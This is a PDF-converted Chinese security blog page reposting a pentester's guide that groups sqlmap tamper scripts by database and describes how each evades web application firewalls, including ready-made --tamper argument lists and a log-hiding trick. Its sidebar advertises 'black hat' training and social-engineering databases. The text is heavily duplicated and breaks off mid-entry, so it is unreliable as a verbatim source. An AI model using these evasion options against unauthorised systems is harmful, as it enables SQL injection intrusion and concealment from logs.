sqlmap-tamper-scripts sqlmap tamper 详解sqlmap-tamper-scripts sqlmap tamper 详解...
TRANSCRIPT
评论↓评论↓ 隐藏隐藏 分享分享 关灯关灯 小小 中中 大大
sqlmap-tamper-scripts sqlmap tamper 详详解解sqlmap-tamper-scripts sqlmap tamper 详详解解
首页首页 » » 原创作品原创作品 » sqlmap-tamper-scripts sqlmap tamper 详解 » sqlmap-tamper-scripts sqlmap tamper 详解
When using SQLMap Tamper scripts while doing a pentest can be a bit When using SQLMap Tamper scripts while doing a pentest can be a bit confusing and a lot of work to figureconfusing and a lot of work to figure
out which scripts you need to use out which scripts you need to use and when to use them. I have an upcoming pentest I need to perform andand when to use them. I have an upcoming pentest I need to perform and
figured this is the perfect time to organize �all of this.figured this is the perfect time to organize �all of this.
First of all, not all scripts are created equal. Some work for First of all, not all scripts are created equal. Some work for general run-of-the mill sql injection attacks andgeneral run-of-the mill sql injection attacks and
others are for others are for specific databases. Some are not actually sure if it works on all specific databases. Some are not actually sure if it works on all databases and some have onlydatabases and some have only
been officially tested against older been officially tested against older versions of database applications. This is the very definition of hit versions of database applications. This is the very definition of hit and miss.and miss.
I reviewed each tamper script and tried to place them in boxes. If I reviewed each tamper script and tried to place them in boxes. If you have feedback on any of these boxesyou have feedback on any of these boxes
PLEASE don’t be shy! Let me know PLEASE don’t be shy! Let me know in the comment section. I want this to be a good resource and your help in the comment section. I want this to be a good resource and your help wouldwould
be greatly appreciated.be greatly appreciated.
The General Scripts section contains both non-specific database The General Scripts section contains both non-specific database exploits as well as those that cover a wideexploits as well as those that cover a wide
range of databases. In my range of databases. In my thoughts, this would be a good start script box to use as an initial hit thoughts, this would be a good start script box to use as an initial hit on an application.on an application.
Again, feedback appreciated.Again, feedback appreciated.
I am going to include the syntax to run each section as well as one I am going to include the syntax to run each section as well as one to run every script. SQLMap will organizeto run every script. SQLMap will organize
them automatically. However, I them automatically. However, I captured traffic from running all scripts and it didn’t look familiar captured traffic from running all scripts and it didn’t look familiar at all. �notat all. �not
sure if it is a good idea to do this or not. Feedback sure if it is a good idea to do this or not. Feedback welcome!welcome!
Jump toJump to
generalgeneral
Microsoft-AccessMicrosoft-Access
mssqlmssql
mysqlmysql
oracleoracle
postresqlpostresql
sapsap
sqlitesqlite
--tamper=apostrophemask,apostrophenullencode,appendnullbyte,base64encode,between,bluecoat,chardoubleencode,ch--tamper=apostrophemask,apostrophenullencode,appendnullbyte,base64encode,between,bluecoat,chardoubleencode,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecuritarencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,nonrecursivereplacement,percentage,randomcase,randomcommenyversioned,modsecurityzeroversioned,multiplespaces,nonrecursivereplacement,percentage,randomcase,randomcomments,securesphere,space2comment,space2dash,space2hash,space2morehash,space2mssqlblank,space2mssqlhash,spats,securesphere,space2comment,space2dash,space2hash,space2morehash,space2mssqlblank,space2mssqlhash,space2mysqlblank,space2mysqldash,space2plus,space2randomblank,sp_password,unionalltounion,unmagicquotes,versionce2mysqlblank,space2mysqldash,space2plus,space2randomblank,sp_password,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywordsedkeywords,versionedmorekeywords
General ScriptsGeneral Scripts--tamper=apostrophemask,apostrophenullencode,base64encode,between,chardoubleencode,charencode,charunicodeen--tamper=apostrophemask,apostrophenullencode,base64encode,between,chardoubleencode,charencode,charunicodeencode,equaltolike,greatest,ifnull2ifisnull,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,scode,equaltolike,greatest,ifnull2ifisnull,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2plus,space2randomblank,unionalltounion,unmagicquotespace2comment,space2plus,space2randomblank,unionalltounion,unmagicquotes
apostrophemaskapostrophemask
Replaces apostrophe character with its UTF-8 full width counterpartReplaces apostrophe character with its UTF-8 full width counterpart
apostrophenullencodeapostrophenullencode
Replaces apostrophe character with its illegal double unicode counterpartReplaces apostrophe character with its illegal double unicode counterpart
代码审计(72)代码审计(72) 原创作品(120)原创作品(120)
漏洞收集(40)漏洞收集(40) 渗透测试(238)渗透测试(238)
渗透编程(21)渗透编程(21) 神器下载(87)神器下载(87)
学员作品(28)学员作品(28) 业界见闻(50)业界见闻(50)
Mrxn's blogMrxn's blog 落雪依然's Blog落雪依然's Blog
暗月培暗月培训训服服务务(广告)(广告)
1 暗月内部安全培训规定和费用说明暗月内部安全培训规定和费用说明
2 暗月PHP代码审计系列教程暗月PHP代码审计系列教程
3 暗月第四季课程暗月第四季课程
4 社工库系列教程社工库系列教程
5 暗月安全培训服务第一二季度暗月安全培训服务第一二季度
最新日志最新日志
1 Session fixationSession fixation
2 ubuntu16.04安装met...ubuntu16.04安装met...
3 theharvester 下载theharvester 下载
4 被动式漏洞扫描系统GourdSc...被动式漏洞扫描系统GourdSc...
5 渗透测试执行标准(PTES)渗透测试执行标准(PTES)
热门热门日志日志
1 (首发)dedecms 5.7 ...(首发)dedecms 5.7 ...
2 社工库系列教程社工库系列教程
3 暗月安全培训服务(渗透师、攻城师...暗月安全培训服务(渗透师、攻城师...
4 利用腾讯微博获取QQ号利用腾讯微博获取QQ号
5 soyun30社工数据库soyun30社工数据库
6 DZ论坛最新注入漏洞利用工具(获...DZ论坛最新注入漏洞利用工具(获...
7 学员渗透录六友情检测【毒一无二技...学员渗透录六友情检测【毒一无二技...
8 安全暗月培训服务(代码审计师、漏...安全暗月培训服务(代码审计师、漏...
随机日志随机日志
1 另类的SQL注入方法另类的SQL注入方法
2 Discuz! X 后台批量破解...Discuz! X 后台批量破解...
3 学员渗透录二十三SQL Serv...学员渗透录二十三SQL Serv...
4 价值万元黑帽就业内部教程泄露!价值万元黑帽就业内部教程泄露!
5 wdcp虚拟主机管理系统注入利用...wdcp虚拟主机管理系统注入利用...
6 险企网销泄信息1700万条 黑客...险企网销泄信息1700万条 黑客...
7 新老版本安全狗拦截添加账户存在绕...新老版本安全狗拦截添加账户存在绕...
8 暗月爆库鸡暗月爆库鸡
分分类类
链链接接
二千人交流群 二千人交流群 131634501131634501[挤眼]加进来一起玩耍![挤眼]加进来一起玩耍!
首首页页首首页页 代代码审计码审计代代码审计码审计 原原创创作品作品原原创创作品作品 渗透渗透测试测试渗透渗透测试测试 学学员员作品作品学学员员作品作品 神器下神器下载载神器下神器下载载 搜搜更健康搜搜更健康
AprApr111120152015
converted by Web2PDFConvert.com
base64encodebase64encode
Base64 all characters in a given payloadBase64 all characters in a given payload
betweenbetween
Replaces greater than operator (‘>’) with ‘NOT BETWEEN 0 AND #’Replaces greater than operator (‘>’) with ‘NOT BETWEEN 0 AND #’
Replaces equals operator (‘=’) with ‘BETWEEN # AND #’Replaces equals operator (‘=’) with ‘BETWEEN # AND #’
Tested against:Tested against:
* Microsoft SQL Server 2005* Microsoft SQL Server 2005
* MySQL 4, 5.0 and 5.5* MySQL 4, 5.0 and 5.5
* Oracle 10g* Oracle 10g
* PostgreSQL 8.3, 8.4, 9.0* PostgreSQL 8.3, 8.4, 9.0
Notes:Notes:
* Useful to bypass weak and bespoke web application firewalls that* Useful to bypass weak and bespoke web application firewalls that
filter the greater than characterfilter the greater than character
* The BETWEEN clause is SQL standard. Hence, this tamper script* The BETWEEN clause is SQL standard. Hence, this tamper script
should work against all (?) databasesshould work against all (?) databases
chardoubleencodechardoubleencode
Double url-encodes all characters in a given payload (not processingDouble url-encodes all characters in a given payload (not processing
already encoded)already encoded)
Notes:Notes:
* Useful to bypass some weak web application firewalls that do not* Useful to bypass some weak web application firewalls that do not
double url-decode the request before processing it through theirdouble url-decode the request before processing it through their
rulesetruleset
charencodecharencode
Url-encodes all characters in a given payload (not processing alreadyUrl-encodes all characters in a given payload (not processing already
encoded)encoded)
Tested against:Tested against:
* Microsoft SQL Server 2005* Microsoft SQL Server 2005
* MySQL 4, 5.0 and 5.5* MySQL 4, 5.0 and 5.5
* Oracle 10g* Oracle 10g
* PostgreSQL 8.3, 8.4, 9.0* PostgreSQL 8.3, 8.4, 9.0
Notes:Notes:
* Useful to bypass very weak web application firewalls that do not* Useful to bypass very weak web application firewalls that do not
url-decode the request before processing it through their ruleseturl-decode the request before processing it through their ruleset
* The web server will anyway pass the url-decoded version behind,* The web server will anyway pass the url-decoded version behind,
hehencnce it should work against any DBMSe it should work against any DBMS
charunicodeencodecharunicodeencode
Unicode-url-encodes non-encoded characters in a given payload (notUnicode-url-encodes non-encoded characters in a given payload (not
processing already encoded)processing already encoded)
Requirement:Requirement:
* ASP* ASP
* ASP.NET* ASP.NET
Tested against:Tested against:
* Microsoft SQL Server 2000* Microsoft SQL Server 2000
黑客榜上榜黑客榜上榜 moon's blogmoon's blog
极安全极安全 seay博客seay博客
情小北's Blog情小北's Blog 重庆黑客基地重庆黑客基地
情'Blog情'Blog 中国教程网中国教程网
花刺's Blog花刺's Blog CodeSecTeamCodeSecTeam
水木博客水木博客 Leesec's Blo...Leesec's Blo...
clhac|博客clhac|博客 七行者博客七行者博客
[#70Sec ~][#70Sec ~] 合购资源论坛合购资源论坛
90' s Blog90' s Blog 野狼博客野狼博客
氪星人氪星人 漫步云端's Blog漫步云端's Blog
navisecnavisec The's BlogThe's Blog
习科联创习科联创 14X安全14X安全
漏洞时代漏洞时代 any3ite's Bl...any3ite's Bl...
红客帝国红客帝国 SEMSEM
易梦网络易梦网络 lostwolf 's ...lostwolf 's ...
dc3博客dc3博客 黑帽论坛黑帽论坛
中国白客联盟中国白客联盟 危险漫步博客危险漫步博客
中国黑客部中国黑客部 吾爱漏洞吾爱漏洞
极客牛极客牛 特别的人特别的人
Exploit Scho...Exploit Scho... VER007博客VER007博客
影风's Blog影风's Blog 4ido10n's Bl...4ido10n's Bl...
风启安全小组风启安全小组 r00ts小组r00ts小组
0nise's Blog0nise's Blog keen8博客keen8博客
漏洞银行漏洞银行
converted by Web2PDFConvert.com
* Microsoft SQL Server 2005* Microsoft SQL Server 2005
* MySQL 5.1.56* MySQL 5.1.56
* PostgreSQL 9.0.3* PostgreSQL 9.0.3
Notes:Notes:
* Useful to bypass weak web application firewalls that do not* Useful to bypass weak web application firewalls that do not
unicode url-decode the request before processing it through theirunicode url-decode the request before processing it through their
rulesetruleset
equaltolikeequaltolike
Replaces all occurances of operator equal (‘=’) with operator ‘LIKE’Replaces all occurances of operator equal (‘=’) with operator ‘LIKE’
Tested against:Tested against:
* Microsoft SQL Server 2005* Microsoft SQL Server 2005
* MySQL 4, 5.0 and 5.5* MySQL 4, 5.0 and 5.5
Notes:Notes:
* Useful to bypass weak and bespoke web application firewalls that* Useful to bypass weak and bespoke web application firewalls that
filter the equal character (‘=’)filter the equal character (‘=’)
* The LIKE operator is SQL standard. Hence, this tamper script* The LIKE operator is SQL standard. Hence, this tamper script
should work against all (?) databasesshould work against all (?) databases
greatestgreatest
Replaces greater than operator (‘>’) with ‘GREATEST’ counterpartReplaces greater than operator (‘>’) with ‘GREATEST’ counterpart
Tested against:Tested against:
* MySQL 4, 5.0 and 5.5* MySQL 4, 5.0 and 5.5
* Oracle 10g* Oracle 10g
* PostgreSQL 8.3, 8.4, 9.0* PostgreSQL 8.3, 8.4, 9.0
Notes:Notes:
* Useful to bypass weak and bespoke web application firewalls that* Useful to bypass weak and bespoke web application firewalls that
filter the greater than characterfilter the greater than character
* The GREATEST clause is a widespread SQL command. Hence, this* The GREATEST clause is a widespread SQL command. Hence, this
tamper script should work against majority of databasestamper script should work against majority of databases
ifnull2ifisnullifnull2ifisnull
Replaces instances like ‘IFNULL(A, B)’ with ‘IF(ISNULL(A), B, A)’Replaces instances like ‘IFNULL(A, B)’ with ‘IF(ISNULL(A), B, A)’
Requirement:Requirement:
* MySQL* MySQL
* SQLite (possibly)* SQLite (possibly)
* SAP MaxDB (possibly)* SAP MaxDB (possibly)
Tested against:Tested against:
* MySQL 5.0 and 5.5* MySQL 5.0 and 5.5
Notes:Notes:
* Useful to bypass very weak and bespoke web application firewalls* Useful to bypass very weak and bespoke web application firewalls
that filter the IFNULL() functionthat filter the IFNULL() function
multiplespacesmultiplespaces
Adds multiple spaces around SQL keywordsAdds multiple spaces around SQL keywords
Notes:Notes:
converted by Web2PDFConvert.com
* Useful to bypass very weak and bespoke web application firewalls* Useful to bypass very weak and bespoke web application firewalls
that has poorly written permissive regular expressionsthat has poorly written permissive regular expressions
Reference: Reference: https://www.owasp.org/images/7/74/Advanced_SQL_Injection.ppthttps://www.owasp.org/images/7/74/Advanced_SQL_Injection.ppt
nonrecursivereplacementnonrecursivereplacement
Replaces predefined SQL keywords with representationsReplaces predefined SQL keywords with representations
suitable for replacement (e.g. .replace(“SELECT”, “”)) filterssuitable for replacement (e.g. .replace(“SELECT”, “”)) filters
Notes:Notes:
* Useful to bypass very weak custom filters* Useful to bypass very weak custom filters
randomcaserandomcase
Replaces each keyword character with random case valueReplaces each keyword character with random case value
Tested against:Tested against:
* Microsoft SQL Server 2005* Microsoft SQL Server 2005
* MySQL 4, 5.0 and 5.5* MySQL 4, 5.0 and 5.5
* Oracle 10g* Oracle 10g
* PostgreSQL 8.3, 8.4, 9.0* PostgreSQL 8.3, 8.4, 9.0
Notes:Notes:
* Useful to bypass very weak and bespoke web application firewalls* Useful to bypass very weak and bespoke web application firewalls
that has poorly written permissive regular expressionsthat has poorly written permissive regular expressions
* This tamper script should work against all (?) databases* This tamper script should work against all (?) databases
securespheresecuresphere
Appends special crafted stringAppends special crafted string
Notes:Notes:
* Useful for bypassing Imperva SecureSphere WAF* Useful for bypassing Imperva SecureSphere WAF
* Reference: http://seclists.org/fulldisclosure/2011/May/163* Reference: http://seclists.org/fulldisclosure/2011/May/163
space2commentspace2comment
Replaces space character (‘ ‘) with comments ‘/**/’Replaces space character (‘ ‘) with comments ‘/**/’
Tested against:Tested against:
* Microsoft SQL Server 2005* Microsoft SQL Server 2005
* MySQL 4, 5.0 and 5.5* MySQL 4, 5.0 and 5.5
* Oracle 10g* Oracle 10g
* PostgreSQL 8.3, 8.4, 9.0* PostgreSQL 8.3, 8.4, 9.0
Notes:Notes:
* Useful to bypass weak and bespoke web application firewalls* Useful to bypass weak and bespoke web application firewalls
space2plusspace2plus
Replaces space character (‘ ‘) with plus (‘+’)Replaces space character (‘ ‘) with plus (‘+’)
Notes:Notes:
* Is this any useful? The plus get’s url-encoded by sqlmap engine* Is this any useful? The plus get’s url-encoded by sqlmap engine
invalidating the query afterwardsinvalidating the query afterwards
* This tamper script works against all databases* This tamper script works against all databases
space2randomblankspace2randomblank
Replaces space character (‘ ‘) with a random blank character from aReplaces space character (‘ ‘) with a random blank character from a
converted by Web2PDFConvert.com
valid set of alternate charactersvalid set of alternate characters
Tested against:Tested against:
* Microsoft SQL Server 2005* Microsoft SQL Server 2005
* MySQL 4, 5.0 and 5.5* MySQL 4, 5.0 and 5.5
* Oracle 10g* Oracle 10g
* PostgreSQL 8.3, 8.4, 9.0* PostgreSQL 8.3, 8.4, 9.0
Notes:Notes:
* Useful to bypass several web application firewalls* Useful to bypass several web application firewalls
unionalltounionunionalltounion
Replaces UNION ALL SELECT with UNION SELECTReplaces UNION ALL SELECT with UNION SELECT
unmagicquotesunmagicquotes
Replaces quote character (‘) with a multi-byte combo %bf%27 together withReplaces quote character (‘) with a multi-byte combo %bf%27 together with
generic comment at the end (to make it work)generic comment at the end (to make it work)
Notes:Notes:
* Useful for bypassing magic_quotes/addslashes feature* Useful for bypassing magic_quotes/addslashes feature
Reference:Reference:
** http://shiflett.org/blog/2006/jan/addslashes-versus-mysql-real-escape-string http://shiflett.org/blog/2006/jan/addslashes-versus-mysql-real-escape-string
xforwardedforxforwardedfor
Append a fake HTTP header ‘X-Forwarded-For’ to bypassAppend a fake HTTP header ‘X-Forwarded-For’ to bypass
WAF (usually application based) protectionWAF (usually application based) protection
Microsoft AccessMicrosoft Access--tamper=between,bluecoat,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekey--tamper=between,bluecoat,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,nonrecursivereplacement,percentagwords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2hash,space2morehash,space2mysqldash,space2plus,space2rande,randomcase,securesphere,space2comment,space2hash,space2morehash,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywordsomblank,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords
appendnullbyteappendnullbyte
Appends encoded NULL byte character at the end of payloadAppends encoded NULL byte character at the end of payload
Requirement:Requirement:
* Microsoft Access* Microsoft Access
Notes:Notes:
* Useful to bypass weak web application firewalls when the back-end* Useful to bypass weak web application firewalls when the back-end
database management system is Microsoft Access – further uses aredatabase management system is Microsoft Access – further uses are
also possiblealso possible
equaltolikeequaltolike
Replaces all occurances of operator equal (‘=’) with operator ‘LIKE’Replaces all occurances of operator equal (‘=’) with operator ‘LIKE’
Tested against:Tested against:
* Microsoft SQL Server 2005* Microsoft SQL Server 2005
* MySQL 4, 5.0 and 5.5* MySQL 4, 5.0 and 5.5
Notes:Notes:
* Useful to bypass weak and bespoke web application firewalls that* Useful to bypass weak and bespoke web application firewalls that
filter the equal character (‘=’)filter the equal character (‘=’)
* The LIKE operator is SQL standard. Hence, this tamper script* The LIKE operator is SQL standard. Hence, this tamper script
should work against all (?) databasesshould work against all (?) databases
converted by Web2PDFConvert.com
greatestgreatest
Replaces greater than operator (‘>’) with ‘GREATEST’ counterpartReplaces greater than operator (‘>’) with ‘GREATEST’ counterpart
Tested against:Tested against:
* MySQL 4, 5.0 and 5.5* MySQL 4, 5.0 and 5.5
* Oracle 10g* Oracle 10g
* PostgreSQL 8.3, 8.4, 9.0* PostgreSQL 8.3, 8.4, 9.0
Notes:Notes:
* Useful to bypass weak and bespoke web application firewalls that* Useful to bypass weak and bespoke web application firewalls that
filter the greater than characterfilter the greater than character
* The GREATEST clause is a widespread SQL command. Hence, this* The GREATEST clause is a widespread SQL command. Hence, this
tamper script should work against majority of databasestamper script should work against majority of databases
multiplespacesmultiplespaces
Adds multiple spaces around SQL keywordsAdds multiple spaces around SQL keywords
Notes:Notes:
* Useful to bypass very weak and bespoke web application firewalls* Useful to bypass very weak and bespoke web application firewalls
that has poorly written permissive regular expressionsthat has poorly written permissive regular expressions
Reference: Reference: https://www.owasp.org/images/7/74/Advanced_SQL_Injection.ppthttps://www.owasp.org/images/7/74/Advanced_SQL_Injection.ppt
nonrecursivereplacementnonrecursivereplacement
Replaces predefined SQL keywords with representationsReplaces predefined SQL keywords with representations
suitable for replacement (e.g. .replace(“SELECT”, “”)) filterssuitable for replacement (e.g. .replace(“SELECT”, “”)) filters
Notes:Notes:
* Useful to bypass very weak custom filters* Useful to bypass very weak custom filters
randomcaserandomcase
Replaces each keyword character with random case valueReplaces each keyword character with random case value
Tested against:Tested against:
* Microsoft SQL Server 2005* Microsoft SQL Server 2005
* MySQL 4, 5.0 and 5.5* MySQL 4, 5.0 and 5.5
* Oracle 10g* Oracle 10g
* PostgreSQL 8.3, 8.4, 9.0* PostgreSQL 8.3, 8.4, 9.0
Notes:Notes:
* Useful to bypass very weak and bespoke web application firewalls* Useful to bypass very weak and bespoke web application firewalls
that has poorly written permissive regular expressionsthat has poorly written permissive regular expressions
* This tamper script should work against all (?) databases* This tamper script should work against all (?) databases
securespheresecuresphere
Appends special crafted stringAppends special crafted string
Notes:Notes:
* Useful for bypassing Imperva SecureSphere WAF* Useful for bypassing Imperva SecureSphere WAF
* Reference: http://seclists.org/fulldisclosure/2011/May/163* Reference: http://seclists.org/fulldisclosure/2011/May/163
converted by Web2PDFConvert.com
space2commentspace2comment
Replaces space character (‘ ‘) with comments ‘/**/’Replaces space character (‘ ‘) with comments ‘/**/’
Tested against:Tested against:
* Microsoft SQL Server 2005* Microsoft SQL Server 2005
* MySQL 4, 5.0 and 5.5* MySQL 4, 5.0 and 5.5
* Oracle 10g* Oracle 10g
* PostgreSQL 8.3, 8.4, 9.0* PostgreSQL 8.3, 8.4, 9.0
Notes:Notes:
* Useful to bypass weak and bespoke web application firewalls* Useful to bypass weak and bespoke web application firewalls
space2plusspace2plus
Replaces space character (‘ ‘) with plus (‘+’)Replaces space character (‘ ‘) with plus (‘+’)
Notes:Notes:
* Is this any useful? The plus get’s url-encoded by * Is this any useful? The plus get’s url-encoded by sqlmapsqlmap engine engine
invalidating the query afterwardsinvalidating the query afterwards
* This tamper script works against all databases* This tamper script works against all databases
unionalltounionunionalltounion
Replaces UNION ALL SELECT with UNION SELECTReplaces UNION ALL SELECT with UNION SELECT
unmagicquotesunmagicquotes
Replaces quote character (‘) with a multi-byte combo %bf%27 together withReplaces quote character (‘) with a multi-byte combo %bf%27 together with
generic comment at the end (to make it work)generic comment at the end (to make it work)
Notes:Notes:
* Useful for bypassing magic_quotes/addslashes feature* Useful for bypassing magic_quotes/addslashes feature
Reference:Reference:
** http://shiflett.org/blog/2006/jan/addslashes-versus-mysql-real-escape-string http://shiflett.org/blog/2006/jan/addslashes-versus-mysql-real-escape-string
xforwardedforxforwardedfor
Append a fake HTTP header ‘X-Forwarded-For’ to bypassAppend a fake HTTP header ‘X-Forwarded-For’ to bypass
WAF (usually application based) protectionWAF (usually application based) protection
Microsoft SQL ServerMicrosoft SQL Server--tamper=between,charencode,charunicodeencode,equaltolike,greatest,multiplespaces,nonrecursivereplacement,percent--tamper=between,charencode,charunicodeencode,equaltolike,greatest,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,sp_password,space2comment,space2dash,space2mssqlblank,space2mysqldash,spaceage,randomcase,securesphere,sp_password,space2comment,space2dash,space2mssqlblank,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes2plus,space2randomblank,unionalltounion,unmagicquotes
betweenbetween
Replaces greater than operator (‘>’) with ‘NOT BETWEEN 0 AND #’Replaces greater than operator (‘>’) with ‘NOT BETWEEN 0 AND #’
Replaces equals operator (‘=’) with ‘BETWEEN # AND #’Replaces equals operator (‘=’) with ‘BETWEEN # AND #’
Tested against:Tested against:
* Microsoft SQL Server 2005* Microsoft SQL Server 2005
* MySQL 4, 5.0 and 5.5* MySQL 4, 5.0 and 5.5
* Oracle 10g* Oracle 10g
converted by Web2PDFConvert.com
* PostgreSQL 8.3, 8.4, 9.0* PostgreSQL 8.3, 8.4, 9.0
Notes:Notes:
* Useful to bypass weak and bespoke web application firewalls that* Useful to bypass weak and bespoke web application firewalls that
filter the greater than characterfilter the greater than character
* The BETWEEN clause is SQL standard. Hence, this tamper script* The BETWEEN clause is SQL standard. Hence, this tamper script
should work against all (?) databasesshould work against all (?) databases
charencodecharencode
Url-encodes all characters in a given payload (not processing alreadyUrl-encodes all characters in a given payload (not processing already
encoded)encoded)
Tested against:Tested against:
* Microsoft SQL Server 2005* Microsoft SQL Server 2005
* MySQL 4, 5.0 and 5.5* MySQL 4, 5.0 and 5.5
* Oracle 10g* Oracle 10g
* PostgreSQL 8.3, 8.4, 9.0* PostgreSQL 8.3, 8.4, 9.0
Notes:Notes:
* Useful to bypass very weak web application firewalls that do not* Useful to bypass very weak web application firewalls that do not
url-decode the request before processing it through their ruleseturl-decode the request before processing it through their ruleset
* The web server will anyway pass the url-decoded version behind,* The web server will anyway pass the url-decoded version behind,
hence it should work against any DBMShence it should work against any DBMS
charunicodeencodecharunicodeencode
Unicode-url-encodes non-encoded characters in a given payload (notUnicode-url-encodes non-encoded characters in a given payload (not
processing already encoded)processing already encoded)
Requirement:Requirement:
* ASP* ASP
* ASP.* ASP.NETNET
Tested against:Tested against:
* Microsoft SQL Server 2000* Microsoft SQL Server 2000
* Microsoft SQL Server 2005* Microsoft SQL Server 2005
* MySQL 5.1.56* MySQL 5.1.56
* PostgreSQL 9.0.3* PostgreSQL 9.0.3
Notes:Notes:
* Useful to bypass weak web application firewalls that do not* Useful to bypass weak web application firewalls that do not
unicode url-decode the request before processing it through theirunicode url-decode the request before processing it through their
rulesetruleset
equaltolikeequaltolike
Replaces all occurances of operator equal (‘=’) with operator ‘LIKE’Replaces all occurances of operator equal (‘=’) with operator ‘LIKE’
Tested against:Tested against:
* Microsoft SQL Server 2005* Microsoft SQL Server 2005
* MySQL 4, 5.0 and 5.5* MySQL 4, 5.0 and 5.5
Notes:Notes:
* Useful to bypass weak and bespoke web application firewalls that* Useful to bypass weak and bespoke web application firewalls that
filter the equal character (‘=’)filter the equal character (‘=’)
* The LIKE operator is SQL standard. Hence, this tamper script* The LIKE operator is SQL standard. Hence, this tamper script
should work against all (?) databasesshould work against all (?) databases
converted by Web2PDFConvert.com
greatestgreatest
Replaces greater than operator (‘>’) with ‘GREATEST’ counterpartReplaces greater than operator (‘>’) with ‘GREATEST’ counterpart
Tested against:Tested against:
* MySQL 4, 5.0 and 5.5* MySQL 4, 5.0 and 5.5
* Oracle 10g* Oracle 10g
* PostgreSQL 8.3, 8.4, 9.0* PostgreSQL 8.3, 8.4, 9.0
Notes:Notes:
* Useful to bypass weak and bespoke web application firewalls that* Useful to bypass weak and bespoke web application firewalls that
filter the greater than characterfilter the greater than character
* The GREATEST clause is a widespread SQL command. Hence, this* The GREATEST clause is a widespread SQL command. Hence, this
tamper script should work against majority of databasestamper script should work against majority of databases
multiplespacesmultiplespaces
Adds multiple spaces around SQL keywordsAdds multiple spaces around SQL keywords
Notes:Notes:
* Useful to bypass very weak and bespoke web application firewalls* Useful to bypass very weak and bespoke web application firewalls
that has poorly written permissive regular expressionsthat has poorly written permissive regular expressions
Reference: Reference: https://www.owasp.org/images/7/74/Advanced_SQL_Injection.ppthttps://www.owasp.org/images/7/74/Advanced_SQL_Injection.ppt
nonrecursivereplacementnonrecursivereplacement
Replaces predefined SQL keywords with representationsReplaces predefined SQL keywords with representations
suitable for replacement (e.g. .replace(“SELECT”, “”)) filterssuitable for replacement (e.g. .replace(“SELECT”, “”)) filters
Notes:Notes:
* Useful to bypass very weak custom filters* Useful to bypass very weak custom filters
percentagepercentage
Adds a percentage sign (‘%’) infront of each characterAdds a percentage sign (‘%’) infront of each character
Requirement:Requirement:
* ASP* ASP
Tested against:Tested against:
* Microsoft SQL Server 2000, 2005* Microsoft SQL Server 2000, 2005
* MySQL 5.1.56, 5.5.11* MySQL 5.1.56, 5.5.11
* PostgreSQL 9.0* PostgreSQL 9.0
Notes:Notes:
* Useful to bypass weak and bespoke web application firewalls* Useful to bypass weak and bespoke web application firewalls
randomcaserandomcase
Replaces each keyword character with random case valueReplaces each keyword character with random case value
Tested against:Tested against:
* Microsoft SQL Server 2005* Microsoft SQL Server 2005
* MySQL 4, 5.0 and 5.5* MySQL 4, 5.0 and 5.5
* Oracle 10g* Oracle 10g
* PostgreSQL 8.3, 8.4, 9.0* PostgreSQL 8.3, 8.4, 9.0
converted by Web2PDFConvert.com
Notes:Notes:
* Useful to bypass very weak and bespoke web application firewalls* Useful to bypass very weak and bespoke web application firewalls
that has poorly written permissive regular expressionsthat has poorly written permissive regular expressions
* This tamper script should work against all (?) databases* This tamper script should work against all (?) databases
securespheresecuresphere
Appends special crafted stringAppends special crafted string
Notes:Notes:
* Useful for bypassing Imperva SecureSphere WAF* Useful for bypassing Imperva SecureSphere WAF
* Reference: http://seclists.org/fulldisclosure/2011/May/163* Reference: http://seclists.org/fulldisclosure/2011/May/163
sp_passwordsp_password
Appends ‘sp_password’ to the end of the payload for automatic obfuscation from DBMS logsAppends ‘sp_password’ to the end of the payload for automatic obfuscation from DBMS logs
Requirement:Requirement:
* MSSQL* MSSQL
Notes:Notes:
* Appending sp_password to the end of the query will hide it from T-SQL logs as a security measure* Appending sp_password to the end of the query will hide it from T-SQL logs as a security measure
* Reference: http://websec.ca/kb/sql_injection* Reference: http://websec.ca/kb/sql_injection
space2commentspace2comment
Replaces space character (‘ ‘) with comments ‘/**/’Replaces space character (‘ ‘) with comments ‘/**/’
Tested against:Tested against:
* Microsoft SQL Server 2005* Microsoft SQL Server 2005
* MySQL 4, 5.0 and 5.5* MySQL 4, 5.0 and 5.5
* Oracle 10g* Oracle 10g
* PostgreSQL 8.3, 8.4, 9.0* PostgreSQL 8.3, 8.4, 9.0
Notes:Notes:
* Useful to bypass weak and bespoke web application firewalls* Useful to bypass weak and bespoke web application firewalls
space2dashspace2dash
Replaces space character (‘ ‘) with a dash comment (‘–’) followed byReplaces space character (‘ ‘) with a dash comment (‘–’) followed by
a random string and a new line (‘\n’)a random string and a new line (‘\n’)
Requirement:Requirement:
* MSSQL* MSSQL
* SQLite* SQLite
Notes:Notes:
* Useful to bypass several web application firewalls* Useful to bypass several web application firewalls
* Used during the ZeroNights SQL injection challenge,* Used during the ZeroNights SQL injection challenge,
https://proton.onsec.ru/contest/https://proton.onsec.ru/contest/
space2mssqlblankspace2mssqlblank
Replaces space character (‘ ‘) with a random blank character from aReplaces space character (‘ ‘) with a random blank character from a
valid set of alternate charactersvalid set of alternate characters
Requirement:Requirement:
* Microsoft SQL Server* Microsoft SQL Server
converted by Web2PDFConvert.com
Tested against:Tested against:
* Microsoft SQL Server 2000* Microsoft SQL Server 2000
* Microsoft SQL Server 2005* Microsoft SQL Server 2005
Notes:Notes:
* Useful to bypass several web application firewalls* Useful to bypass several web application firewalls
space2space2mysqlmysqldashdash
Replaces space character (‘ ‘) with a dash comment (‘–’) followed byReplaces space character (‘ ‘) with a dash comment (‘–’) followed by
a new line (‘\n’)a new line (‘\n’)
Requirement:Requirement:
* MySQL* MySQL
* MSSQL* MSSQL
Tested against:Tested against:
